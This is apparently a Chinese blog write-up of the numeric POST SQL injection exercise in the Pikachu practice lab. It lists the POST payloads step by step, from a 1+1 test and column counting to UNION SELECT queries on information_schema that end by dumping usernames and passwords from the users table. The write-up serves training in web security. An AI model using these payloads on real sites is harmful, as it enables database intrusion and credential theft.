数字型注入(post)
打开靶场,发现数字列表查询,点击查询发现POST
请求和id
、submit
参数
bp抓包,根据题目数字注入提示,尝试用1+1方式查询,+
编码为%2B
id=1%2B1&submit=%E6%9F%A5%E8%AF%A2
成功回显
order by查询字段数,在为3的时候回显异常,判断字段数为2
查库,查出数据库为pikachu
id=1 union select 1,database()&submit=%E6%9F%A5%E8%AF%A2
爆库,确定pikachu
为目标数据库
id=1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata&submit=%E6%9F%A5%E8%AF%A2
爆表,查询出全部数据表
id=1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu"&submit=%E6%9F%A5%E8%AF%A2
爆users字段
id=1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="users"&submit=%E6%9F%A5%E8%AF%A2
爆字段
id=1 UNION SELECT 1,concat(id,'--',username,'--',password,'--',level) from users&submit=%E6%9F%A5%E8%AF%A2
成功拿下全部用户信息
标签:E8%,A5%,AF%,submit,数字型,A2,post,id,注入 From: https://www.cnblogs.com/tazmi/p/18547393